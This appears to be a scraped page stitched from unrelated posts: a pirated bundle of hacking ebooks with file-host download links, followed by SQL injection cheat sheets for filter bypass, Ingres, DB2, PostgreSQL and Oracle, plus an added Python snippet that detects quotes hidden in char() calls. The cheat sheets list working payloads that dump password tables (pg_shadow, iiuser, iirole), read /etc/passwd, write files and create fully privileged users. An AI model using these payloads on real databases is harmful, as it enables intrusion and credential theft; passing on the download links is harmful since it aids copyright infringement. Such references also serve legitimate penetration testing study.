--
0

Going beyond the issues of analyzing and optimizing programs as well as creating the means of protecting information, this guide takes on the programming problem of how to go about disassembling a program with holes without its source code. Detailing hacking methods used to analyze programs using a debugger and disassembler such as virtual functions, local and global variables, branching, loops, objects and their hierarchy, and mathematical operators, this guide covers methods of fighting disassemblers, self-modifying code in operating systems, and executing code in the stack.
* Hacking and Cracking
- Hacking for Dummies Apr 2004.pdf
- CD Cracking Uncovered – Protection Against Unsanctioned CD Copying.chm
- eBook – Hacking – Maximum Security-A Hacker’s Guide to Prote.pdf
- eBook O’Reilly – Hacking TCP IP Security.pdf
- Excel Hacks – 100 Industrial-Strength Tips & Tools.chm
- Hacker Disassembling Uncovered (2003).chm
- Hackers Beware (2001).pdf
- Hacker’s Delight.chm
- Hacking – Firewalls And Networks How To Hack Into Remote Computers.pdf
- Hacking – Hack Proofing Your Network – Internet Tradecraft.pdf
- Hacking – The Art Of Exploitation (2003).chm
- Hacking – The Art Of Exploitation.chm
- Hacking Access to Other Peoples Systems Made Simple.pdf
- hacking exposed – chapter16 – hacking the internet user.pdf
- Hacking for Beginers.rar
- Hacking Knoppix.chm
- Hacking-Maximum Security A Hackers Guide To Protecting Your Internet Site and Network.pdf
- Hardware Hacking – Have Fun While Voiding Your Warranty.pdf
- PC Hacks – 100 Industrial-Strength Tips & Tools.chm
- PDF Hacks – 100 Industrial-Strength Tips & Tools.chm
- Retro Gaming Hacks – Tips & Tools For Playing The Classics.chm
- Wi-Foo – The Secrets Of Wireless Hacking.chm
* Hackers Black Book
- 2_Hackers Blackbook-Eng.pdf
- Ebooks – The Hackers Blackbook (1).pdf
- Hackers Black Book.rar
- Hackers Blackbook.pdf
- hackers_blackbook.pdf
Code:

http://hotfile.com/dl/75200664/b244df5/37Cracking-Hacking-Assembling-Disassembling.part1.rar.html
http://hotfile.com/dl/75200691/d4bbf89/37Cracking-Hacking-Assembling-Disassembling.part2.rar.html
http://hotfile.com/dl/75200717/dc649ed/37Cracking-Hacking-Assembling-Disassembling.part3.rar.html
http://hotfile.com/dl/75200834/97c8574/37Cracking-Hacking-Assembling-Disassembling.part4.rar.html
http://hotfile.com/dl/75200983/d802229/37Cracking-Hacking-Assembling-Disassembling.part5.rar.html

--
0

» Bypass SQL Injection Filters
Payload | Description (if any)
select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) | Writing info into files without single quotes (example). You must specify a new file (it may not exist) and give the correct pathname.
select * from login where user = char(39,97,39) | Using char() to bypass restrictions.
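
A defender-side view of the two rows above, as an added example that is not part of the original post: neither statement contains a quote character, so a filter that only looks for `'` passes both, and decoding the char() calls before inspection shows the literals they build. The names `decode_char_runs` and `hides_quote` are illustrative.

```python
import re

# char(...) with decimal arguments; tolerates spacing such as "char( 39)".
# The \b keeps type names like varchar(10) from matching.
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)
ONLY_COMMA = re.compile(r"\s*,\s*")

# The two statements from the table above, copied as they appear on the page.
PAGE_SAMPLES = [
    "select password from tablename where username = "
    "concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) "
    "into outfile "
    "concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39))",
    "select * from login where user = char(39,97,39)",
]


def decode_char_runs(sql):
    """Return the strings spelled out by char() calls in `sql`.

    Calls separated only by a comma (the arguments of one concat(...)) are
    joined, so each returned item is one reconstructed literal.
    """
    runs, prev_end = [], None
    for m in CHAR_CALL.finditer(sql):
        codes = [int(n) for n in m.group(1).split(",")]
        text = "".join(chr(c) for c in codes if c < 0x110000)
        if prev_end is not None and ONLY_COMMA.fullmatch(sql[prev_end:m.start()]):
            runs[-1] += text          # same argument list: extend the literal
        else:
            runs.append(text)         # a new, separate literal
        prev_end = m.end()
    return runs


def hides_quote(sql):
    """True when the text has no ' character but a char() run decodes to one."""
    return "'" not in sql and any("'" in run for run in decode_char_runs(sql))


if __name__ == "__main__":
    for sample in PAGE_SAMPLES:
        print(hides_quote(sample), decode_char_runs(sample))
```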

--
0

» Ingres
Payload | Description (if any)

Comments:
Normal "--" and C-style /**/ comments are allowed:
select 123; -- sdfjsdlkfj
select 123; /* sdfsdf */

Batching Queries Allowed?
Not via DBI in PERL.  Subsequent statements seem to get ignored:
select blah from table where foo = 1; select … doesn’t matter this is ignored.

Database Version:
select dbmsinfo('_version');

Current Database User:
select dbmsinfo('session_user');

System User for Current Connection:
select dbmsinfo('system_user');

Current Database:
select dbmsinfo('database');

Limiting Rows Returned:
select top 10 blah from table;
select first 10 blah from table;

Returning N Rows starting at Offset M:
Astoundingly, this doesn’t seem to be possible!

List Tables:
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';

List Columns:
select column_name, column_datatype, table_name, table_owner from iicolumns;

List Database Users and Passwords:
First connect to iidbdb, then:
select name, password from iiuser;

FROM clause mandated in SELECTs?
No.  You don’t need to select from “dual” or anything.  The following is legal:
select 1;

UNION supported:
Yes.  Nothing tricky here.  The following is legal:
select 1 union select 2;

Enumerate Tables Privs:
select table_name, permit_user, permit_type from iiaccess;

Enumerate Current Privs:
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');

Length of a string:
select length('abc'); -- returns 3

Bitwise AND:
The function “bit_and” exists, but seems hard to use.  Here’s an example of ANDing 3 and 5 together.  The result is a “byte” type with value \001:
select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

Substring:
select substr('abc', 2, 1); -- returns 'b'

ASCII value of a character: ???
(The “ascii” function exists, but doesn’t seem to do what I’d expect.)

Roles and passwords:
First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;

List Database Procedures:
First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;

Create Users + Granting Privs:
First you need to connect to iidbdb, then:
create user pm with password = 'password';
grant all on current installation to pm;

Time Delays: ???

Execute OS Commands: ???

Write to File System: ???

Concatenation:
select 'abc' || 'def';

Casting:
select cast(123 as varchar);
select cast('123' as integer);

--
0

» DB2
Payload | Description (if any)

Comments:
select blah from foo; -- comment like this

Batching Queries Allowed?
???

Database Version:
select versionnumber, version_timestamp from sysibm.sysversions;

Current Database User:
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;

System User for Current Connection:
select system_user from sysibm.sysdummy1;

Current Database:
select current server from sysibm.sysdummy1;

Limiting Rows Returned:
SELECT foo FROM bar fetch first 1 rows only;

Returning N Rows starting at Offset M:
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

List Tables:
select name from sysibm.systables;

List Columns:
select name, tbname, coltype from sysibm.syscolumns;

List Database Users and Passwords:
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

FROM clause mandated in SELECTs?
Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1;

UNION supported:
Yes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;

Enumerate Tables Privs:
select * from syscat.tabauth;

Enumerate Current Privs:
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;

Length of a string:
select length('abc') from sysibm.sysdummy1; -- returns 3

Bitwise AND:
This page seems to indicate that DB2 has no support for bitwise operators!

Substring:
SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;  -- returns b

ASCII value of a character:
select ascii('A') from sysibm.sysdummy1; -- returns 65

Character from ASCII value:
select chr(65) from sysibm.sysdummy1; -- returns 'A'

Roles and passwords:
N/A (I think DB2 uses OS-level user accounts for authentication.)

List Database Procedures: ???

Create Users + Granting Privs: ???

Time Delays: ???

Execute OS Commands: ???

Write to File System: ???

Concatenation:
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'

Casting:
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;

List schemas:
SELECT schemaname FROM syscat.schemata;

--
0

» PostgreSQL
Payload | Description (if any)
select version(); | View database version.
select current_database(); | Misc. information disclosure
select current_user; | Misc. information disclosure
select session_user; | Misc. information disclosure
select current_setting('log_connections'); | Misc. information disclosure
select current_setting('log_statement'); | Misc. information disclosure
select current_setting('port'); | Misc. information disclosure
select current_setting('password_encryption'); | Misc. information disclosure
select current_setting('krb_server_keyfile'); | Misc. information disclosure
select current_setting('virtual_host'); | Misc. information disclosure
select current_setting('port'); | Misc. information disclosure
select current_setting('config_file'); | Misc. information disclosure
select current_setting('hba_file'); | Misc. information disclosure
select current_setting('data_directory'); | Misc. information disclosure
select * from pg_shadow; | View database usernames and passwords.
select * from pg_group; | View database usernames and passwords.
create table myfile (input TEXT); copy myfile from '/etc/passwd'; select * from myfile; | Read files on the filesystem.
copy myfile to '/tmp/test'; | Write files to filesystem.
str1 || str2 | Concat strings for blind SQL Injection tests.

--
0

» Oracle
Robert Hurlbut has put together an awesome document on Oracle SQL Injection. He seems to have far more experience in this area than I, so I will merely present a link to his blog entry on this topic (http://weblogs.asp.net/rhurlbut/archive/2004/01/24/62560.aspx).
Payload | Description (if any)
str1 || str2 OR CONCAT (str1, str2) | Concat strings for blind SQL Injection tests.